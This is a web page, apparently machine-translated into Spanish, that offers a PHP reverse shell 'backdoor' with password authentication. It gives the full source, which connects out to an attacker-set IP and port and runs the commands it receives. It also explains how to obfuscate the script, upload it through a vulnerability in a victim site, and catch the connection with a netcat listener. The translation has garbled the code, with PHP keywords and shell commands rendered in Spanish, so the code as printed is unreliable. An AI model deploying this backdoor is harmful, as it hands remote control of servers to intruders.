Invierta Shell v1.0 PHP – Autenticación de funciones
Producto Por:
Ashfaq Ansari
Versión:
1.0
Precio:
Libre

Comentado por:
Clasificación:
5
En Octubre 9, 2012
Última modificación:Enero 18, 2013

Resumen:

Invierta conexion PHP Shell con la función de autenticación incorporada. Guión impresionante para proteger su puerta trasera.

Introducción

 

Esta herramienta está diseñada para la situación en la que pentest carga tiene acceso a un servidor web que ejecuta PHP.
Subir este script en algún lugar de la raíz web después ejecutarlo accediendo a la URL correspondiente en su navegador. La secuencia de comandos se abrirá una conexión TCP salientes desde el servidor web a un host y el puerto definido en el guión. Ligado a esta conexión TCP será un shell.
 

Este será un shell interactivo adecuado en el que se pueden ejecutar programas interective como Telnet y SSH.
Esta cubierta tiene una función de autenticación incorporado que evita que otra persona abuse de su puerta trasera.
Se diferencia de la cáscara formulario basado en Web que le permite enviar un solo comando, entonces la salida volverá.
 

Modificar la fuente

 

1
2
3
$ip = "127.0.0.1"; #Cambie esto a su IP pública
$puerto = 4444;      #Cambie esto a su puerto
$contraseña = base64_decode("aGFja3N5c3RlYW0="); #Contraseña por defecto: hacksysteam (MD5)

 

Cambie los valores según su necesidad y situación.
 

Ofuscación La Fuente

 

Una vez que haya hecho la modificación, puede utilizar cualquier línea PHP Obfuscator para codificar el script PHP.
 

Ejemplo: http://www.codeeclipse.com/
 

Antes de ofuscar, cambie los valores anteriores de acuerdo a sus necesidades.
 

Configuración Netcat Listener

 

Inicie un oyente Netcat en un host y el puerto que será accesible por el servidor web.
Utilice el mismo puerto en este momento según lo especificado en el script de shell inversa, por ejemplo, (4444):
 

1
root @ bt:~ # nc -lvvp 4444

 

Subir The Script y ejecutarlo

 

Uso de la vulnerabilidad descubierta por usted en el sitio web, subir reverse_shell.php.
Ejecute el script simplemente buscando el archivo recién cargado en su navegador web.
 

1
http://<Víctima IP>/<Subir Ruta>/reverse_shell.php

 

Nota: No verá ninguna salida en la página web, que continúe en el modo de espera si su éxito.
 

Botín con su cáscara

 

Código Fuente

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
<?php
###################################################
#               Reverse Shell v1.0 #
#             Autenticación Característica #
#                                                 #
#            Hacksys equipo - Panthera #
#             Autor: Ashfaq Ansari #
#            hacksysteam@hotmail.com #
#          http://hacksys.vfreaks.com #
#              Diseñado para Linux #
#             Gracias a lionaneesh #
#             lionaneesh@gmail.com #
###################################################

ini_set('Max_execution_time',0);

$VERSION = "1.0";
$ip = "127.0.0.1"; #Cambie esta
$puerto = 4444;      #Cambie esta
$contraseña = base64_decode(&quot;aGFja3N5c3RlYW0="); #Contraseña por defecto: hacksysteam (MD5)

$bandera = ("
 _ _ _ _____
| |  | |          | |   / ____|                            
| |__| | __ _ ___| | _| (___ _ _ ___
|  __|/ _ ` |/ __| |/ /\___ \| | | / __|
| |  | | (_| | (__|   < ____) | |_| \__ \
|_|  |_|\__,_|\___|_|\_ _____ / __, |___ /
 _______ __ / |                                
|__ __|                      |___ /
   | | ___ __ _ _ __ ___
   | |/ _ \/ _ ` | '_ `_ \
   | |  __ / (_| | | | | | |
   |_|\___|\__,_|_| |_| |_|
   
    Shell Invertir en PHP
    Autor: Ashfaq Ansari
   hacksysteam@hotmail.com
 http://hacksys.vfreaks.com /\n\n"
);

$pwd = shell_exec("Pwd");
$sysinfo = shell_exec("Uname-a");
$identificación = shell_exec('Id | cut-d "(" -F 2 | cut-d ")" -f 1 ');
$fecha = shell_exec("Fecha de");
$sólo = 1337;
$info =
("
Información del sistema:\n$sysinfo
Directorio de trabajo actual: $pwd
Grupo de usuarios: $identificación
Fecha y hora actuales: $fecha\n
"
);

imprimir "\nIntentar conectarse a: $ip en el puerto $puerto ...\n\n";

$sockfd = fsockopen($ip , $puerto , $errno, $errstr );

si($errno != 0)
  {
    imprimir "\n****** Ocurrió un error ******\nNNúmero Error: $errno\nCadena de error: $errstr\n\n";
    la(0);
  }
más si (!$sockfd)
  {
    imprimir "Fatal : Un error inesperado se produjo al intentar conectar!\n";
  }
más
  {
    imprimir "Conectado a: $ip en el puerto $puerto ...\n\n";
    fputs ($sockfd , $bandera);
    fputs($sockfd ,"Introducir contraseña: ");
    $getpass = recortar(fgets($sockfd, strlen($contraseña) + 2));

    si ($getpass == $contraseña)
    {
      fputs($sockfd, "\nExitoso autenticación..\n");
      fputs($sockfd, $info);
      mientras(!EOF($sockfd))
      {
    $cmdPrompt = recortar($identificación) . "@" . recortar($ip) . ":~" . recortar($pwd) . "# ";
    fputs ($sockfd , $cmdPrompt );
    $comando = recortar(fgets($sockfd, $sólo));
        si (recortar($comando) == "Salir")
    {
      fputs($sockfd ,"\nAbortada por el usuario ... Salir de ..." );
      fclose($sockfd);
      la(0);
    }
    fputs($sockfd , "\n" . shell_exec($comando) . "\n");
      }
      fclose($sockfd);
      la(0);
    }
    más
    {
      fputs($sockfd ,"\nContraseña no válida ... Dejar de fumar ...");
      fclose($sockfd);
      la(0);
    }
  }
?>

 

Captura de pantalla

 


 

Descarga Reverse Shell v1.0 PHP – Autenticación de funciones

 

Reverse_Shell_v1.0.zip

 
 
 

21,004 visitas totales, 12 vistas hoy

Las dos fichas siguientes cambian el contenido a continuación.

Ashfaq Ansari

Investigador de Seguridad
Ashfaq Ansari es el fundador de HackSys equipo cuyo nombre en código "Panthera". Él es un investigador de seguridad con experiencia en diversos aspectos de la seguridad de la información. Es autor "HackSys Extreme Vulnerable Conductor" y "Shellcode de la Muerte". También ha escrito y publicado varios documentos técnicos sobre la explotación de software de bajo nivel. Su interés principal radica en "Bajo Explotación Nivel", "Ingeniería Inversa", "Programa de Análisis" y "Híbrido Fuzzing". Él es un fanático de la Inteligencia Artificial y Aprendizaje Automático. Él es el principal capítulo para nula Pune.

Deja un comentario

Su dirección de correo electrónico no será publicada. Los campos necesarios están marcados *